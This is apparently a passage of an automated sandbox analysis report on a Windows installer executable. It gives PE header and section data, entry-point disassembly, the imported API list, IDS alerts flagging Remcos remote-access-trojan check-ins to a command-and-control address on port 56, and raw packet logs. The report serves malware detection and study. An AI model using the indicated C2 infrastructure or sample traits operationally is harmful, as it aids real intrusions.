                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                              Instruction
                                                                              sub esp, 000002D4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              push 00000020h
                                                                              pop edi
                                                                              xor ebx, ebx
                                                                              push 00008001h
                                                                              mov dword ptr [esp+14h], ebx
                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                              mov dword ptr [esp+1Ch], ebx
                                                                              call dword ptr [004080B0h]
                                                                              call dword ptr [004080ACh]
                                                                              cmp ax, 00000006h
                                                                              je 00007F55A8F140F3h
                                                                              push ebx
                                                                              call 00007F55A8F17234h
                                                                              cmp eax, ebx
                                                                              je 00007F55A8F140E9h
                                                                              push 00000C00h
                                                                              call eax
                                                                              mov esi, 004082B8h
                                                                              push esi
                                                                              call 00007F55A8F171AEh
                                                                              push esi
                                                                              call dword ptr [0040815Ch]
                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                              cmp byte ptr [esi], 00000000h
                                                                              jne 00007F55A8F140CCh
                                                                              push ebp
                                                                              push 00000009h
                                                                              call 00007F55A8F17206h
                                                                              push 00000007h
                                                                              call 00007F55A8F171FFh
                                                                              mov dword ptr [00434EE4h], eax
                                                                              call dword ptr [0040803Ch]
                                                                              push ebx
                                                                              call dword ptr [004082A4h]
                                                                              mov dword ptr [00434F98h], eax
                                                                              push ebx
                                                                              lea eax, dword ptr [esp+34h]
                                                                              push 000002B4h
                                                                              push eax
                                                                              push ebx
                                                                              push 0042B208h
                                                                              call dword ptr [00408188h]
                                                                              push 0040A2C8h
                                                                              push 00433EE0h
                                                                              call 00007F55A8F16DE8h
                                                                              call dword ptr [004080A8h]
                                                                              mov ebp, 0043F000h
                                                                              push eax
                                                                              push ebp
                                                                              call 00007F55A8F16DD6h
                                                                              push ebx
                                                                              call dword ptr [00408174h]
                                                                              add word ptr [eax], 0000h
                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2f8e8.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x637b0x6400967d0e18ece4b8dcc63ec9d544660136False0.671484375data6.484796945043301IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x80000x14b00x1600d6b0bc2db2de2a3dd996fda6539cef0eFalse0.4401633522727273data5.033673390997287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xa0000x2afd80x6002aa587c909999ca52be17d0f1ffbd186False0.5188802083333334data4.039551377217298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .ndata0x350000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x530000x2f8e80x2fa000d35228bed9e6f3e44cf465cb8cafb1cFalse0.35265440452755903data6.469094045775567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x533880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.19277179699514965
                                                                              RT_ICON0x63bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.21263401303342444
                                                                              RT_ICON0x6d0580x74dcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9871306324374917
                                                                              RT_ICON0x745380x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.2557301293900185
                                                                              RT_ICON0x799c00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.2701936702881436
                                                                              RT_ICON0x7dbe80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.333298755186722
                                                                              RT_ICON0x801900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.44183864915572235
                                                                              RT_ICON0x812380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.5352459016393443
                                                                              RT_ICON0x81bc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.6604609929078015
                                                                              RT_DIALOG0x820280x100dataEnglishUnited States0.5234375
                                                                              RT_DIALOG0x821280xf8dataEnglishUnited States0.6370967741935484
                                                                              RT_DIALOG0x822200xa0dataEnglishUnited States0.6125
                                                                              RT_DIALOG0x822c00x60dataEnglishUnited States0.7291666666666666
                                                                              RT_GROUP_ICON0x823200x84dataEnglishUnited States0.946969696969697
                                                                              RT_VERSION0x823a80x1fcdataEnglishUnited States0.5413385826771654
                                                                              RT_MANIFEST0x825a80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                              DLLImport
                                                                              KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                              USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                              ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-10T23:50:06.400374+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549396142.250.185.78443TCP
                                                                              2025-01-10T23:50:13.191092+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54944087.120.116.18756TCP
                                                                              2025-01-10T23:50:15.834194+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54945787.120.116.18756TCP
                                                                              2025-01-10T23:50:18.474523+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54947387.120.116.18756TCP
                                                                              2025-01-10T23:50:21.130944+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54949287.120.116.18756TCP
                                                                              2025-01-10T23:50:23.771523+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54950887.120.116.18756TCP
                                                                              2025-01-10T23:50:26.412012+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54952887.120.116.18756TCP
                                                                              2025-01-10T23:50:29.053247+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54954587.120.116.18756TCP
                                                                              2025-01-10T23:50:31.681261+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54956187.120.116.18756TCP
                                                                              2025-01-10T23:50:34.346014+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54958287.120.116.18756TCP
                                                                              2025-01-10T23:50:36.975797+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54960087.120.116.18756TCP
                                                                              2025-01-10T23:50:39.630932+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54962087.120.116.18756TCP
                                                                              2025-01-10T23:50:42.318501+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963287.120.116.18756TCP
                                                                              2025-01-10T23:50:44.943596+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963387.120.116.18756TCP
                                                                              2025-01-10T23:50:47.553052+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963487.120.116.18756TCP
                                                                              2025-01-10T23:50:50.193711+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963587.120.116.18756TCP
                                                                              2025-01-10T23:50:52.834032+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963687.120.116.18756TCP
                                                                              2025-01-10T23:50:55.601321+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963787.120.116.18756TCP
                                                                              2025-01-10T23:50:58.240530+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963887.120.116.18756TCP
                                                                              2025-01-10T23:51:00.865768+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54963987.120.116.18756TCP
                                                                              2025-01-10T23:51:03.639656+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964087.120.116.18756TCP
                                                                              2025-01-10T23:51:06.365467+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964187.120.116.18756TCP
                                                                              2025-01-10T23:51:08.977045+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964287.120.116.18756TCP
                                                                              2025-01-10T23:51:11.646605+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964387.120.116.18756TCP
                                                                              2025-01-10T23:51:14.334286+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964487.120.116.18756TCP
                                                                              2025-01-10T23:51:16.990714+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964587.120.116.18756TCP
                                                                              2025-01-10T23:51:19.679619+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964687.120.116.18756TCP
                                                                              2025-01-10T23:51:22.302695+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964787.120.116.18756TCP
                                                                              2025-01-10T23:51:24.960040+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964887.120.116.18756TCP
                                                                              2025-01-10T23:51:27.601561+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54964987.120.116.18756TCP
                                                                              2025-01-10T23:51:30.225642+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965087.120.116.18756TCP
                                                                              2025-01-10T23:51:32.859651+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965187.120.116.18756TCP
                                                                              2025-01-10T23:51:35.495589+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965287.120.116.18756TCP
                                                                              2025-01-10T23:51:38.167989+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965387.120.116.18756TCP
                                                                              2025-01-10T23:51:40.802585+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965487.120.116.18756TCP
                                                                              2025-01-10T23:51:43.443660+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965587.120.116.18756TCP
                                                                              2025-01-10T23:51:45.959652+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965687.120.116.18756TCP
                                                                              2025-01-10T23:51:48.460410+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965787.120.116.18756TCP
                                                                              2025-01-10T23:51:51.005833+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965887.120.116.18756TCP
                                                                              2025-01-10T23:51:53.463654+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54965987.120.116.18756TCP
                                                                              2025-01-10T23:51:55.881593+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54966087.120.116.18756TCP
                                                                              2025-01-10T23:51:58.302859+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54966187.120.116.18756TCP
                                                                              2025-01-10T23:52:00.711060+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54966287.120.116.18756TCP
                                                                              2025-01-10T23:52:03.037348+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54966387.120.116.18756TCP
                                                                              2025-01-10T23:52:05.335735+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967187.120.116.18756TCP
                                                                              2025-01-10T23:52:07.631080+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967287.120.116.18756TCP
                                                                              2025-01-10T23:52:09.943519+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967387.120.116.18756TCP
                                                                              2025-01-10T23:52:12.217853+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967487.120.116.18756TCP
                                                                              2025-01-10T23:52:14.443570+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967587.120.116.18756TCP
                                                                              2025-01-10T23:52:16.709285+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967687.120.116.18756TCP
                                                                              2025-01-10T23:52:18.927564+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967887.120.116.18756TCP
                                                                              2025-01-10T23:52:21.117636+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54967987.120.116.18756TCP
                                                                              2025-01-10T23:52:23.287082+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968087.120.116.18756TCP
                                                                              2025-01-10T23:52:25.431838+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968187.120.116.18756TCP
                                                                              2025-01-10T23:52:27.584423+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968287.120.116.18756TCP
                                                                              2025-01-10T23:52:29.708792+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968387.120.116.18756TCP
                                                                              2025-01-10T23:52:31.802867+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968487.120.116.18756TCP
                                                                              2025-01-10T23:52:33.881473+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968587.120.116.18756TCP
                                                                              2025-01-10T23:52:35.943061+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968687.120.116.18756TCP
                                                                              2025-01-10T23:52:38.927736+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968787.120.116.18756TCP
                                                                              2025-01-10T23:52:40.959101+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968887.120.116.18756TCP
                                                                              2025-01-10T23:52:42.974324+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54968987.120.116.18756TCP
                                                                              2025-01-10T23:52:45.086422+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969087.120.116.18756TCP
                                                                              2025-01-10T23:52:47.055697+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969187.120.116.18756TCP
                                                                              2025-01-10T23:52:49.055770+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969287.120.116.18756TCP
                                                                              2025-01-10T23:52:51.193547+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969387.120.116.18756TCP
                                                                              2025-01-10T23:52:53.165691+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969487.120.116.18756TCP
                                                                              2025-01-10T23:52:55.083766+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969587.120.116.18756TCP
                                                                              2025-01-10T23:52:57.099445+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969687.120.116.18756TCP
                                                                              2025-01-10T23:52:59.011278+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969787.120.116.18756TCP
                                                                              2025-01-10T23:53:00.943590+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969887.120.116.18756TCP
                                                                              2025-01-10T23:53:02.865752+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54969987.120.116.18756TCP
                                                                              2025-01-10T23:53:04.758994+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970087.120.116.18756TCP
                                                                              2025-01-10T23:53:06.647718+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970187.120.116.18756TCP
                                                                              2025-01-10T23:53:08.570146+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970487.120.116.18756TCP
                                                                              2025-01-10T23:53:10.477822+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970587.120.116.18756TCP
                                                                              2025-01-10T23:53:12.342372+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970687.120.116.18756TCP
                                                                              2025-01-10T23:53:14.350298+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970787.120.116.18756TCP
                                                                              2025-01-10T23:53:16.256961+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970887.120.116.18756TCP
                                                                              2025-01-10T23:53:18.083610+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54970987.120.116.18756TCP
                                                                              2025-01-10T23:53:19.955480+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971087.120.116.18756TCP
                                                                              2025-01-10T23:53:21.786759+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971187.120.116.18756TCP
                                                                              2025-01-10T23:53:23.599331+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971287.120.116.18756TCP
                                                                              2025-01-10T23:53:25.428309+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971387.120.116.18756TCP
                                                                              2025-01-10T23:53:27.307804+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971487.120.116.18756TCP
                                                                              2025-01-10T23:53:29.102022+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971587.120.116.18756TCP
                                                                              2025-01-10T23:53:30.883954+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971687.120.116.18756TCP
                                                                              2025-01-10T23:53:32.708951+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971787.120.116.18756TCP
                                                                              2025-01-10T23:53:34.537850+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971887.120.116.18756TCP
                                                                              2025-01-10T23:53:36.318059+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54971987.120.116.18756TCP
                                                                              2025-01-10T23:53:38.099501+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54972087.120.116.18756TCP
                                                                              2025-01-10T23:53:39.881944+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54972187.120.116.18756TCP
                                                                              2025-01-10T23:53:41.662152+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54972287.120.116.18756TCP
                                                                              2025-01-10T23:53:43.443308+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.54972387.120.116.18756TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 23:49:58.116942883 CET4935353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 23:49:58.121810913 CET53493531.1.1.1192.168.2.5
                                                                              Jan 10, 2025 23:49:58.121886969 CET4935353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 23:49:58.126698017 CET53493531.1.1.1192.168.2.5
                                                                              Jan 10, 2025 23:49:58.573962927 CET4935353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 23:49:58.578973055 CET53493531.1.1.1192.168.2.5
                                                                              Jan 10, 2025 23:49:58.579780102 CET4935353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 23:50:05.340217113 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:05.340266943 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:05.340337038 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:05.363162041 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:05.363213062 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.019195080 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.019293070 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:06.020409107 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.020474911 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:06.089020014 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:06.089052916 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.089602947 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.089668036 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:06.091579914 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:06.135345936 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.400397062 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.400944948 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.401035070 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:06.404505014 CET49396443192.168.2.5142.250.185.78
                                                                              Jan 10, 2025 23:50:06.404547930 CET44349396142.250.185.78192.168.2.5
                                                                              Jan 10, 2025 23:50:06.446939945 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:06.446985960 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:06.447236061 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:06.447376966 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:06.447391033 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:07.103600025 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:07.103681087 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:07.108958960 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:07.108977079 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:07.109262943 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:07.109318972 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:07.109663010 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:07.151333094 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.722616911 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.722711086 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.745565891 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.745839119 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.745943069 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.746001005 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.746016026 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.746063948 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.751743078 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.751800060 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.810797930 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.810853958 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.810870886 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.810888052 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.811063051 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.811063051 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.811727047 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.811783075 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.811788082 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.811832905 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.818181038 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.818238974 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.818254948 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.818324089 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.824389935 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.824445963 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.824462891 CET44349406172.217.16.129192.168.2.5
                                                                              Jan 10, 2025 23:50:09.824505091 CET49406443192.168.2.5172.217.16.129
                                                                              Jan 10, 2025 23:50:09.830648899 CET44349406172.217.16.129192.168.2.5
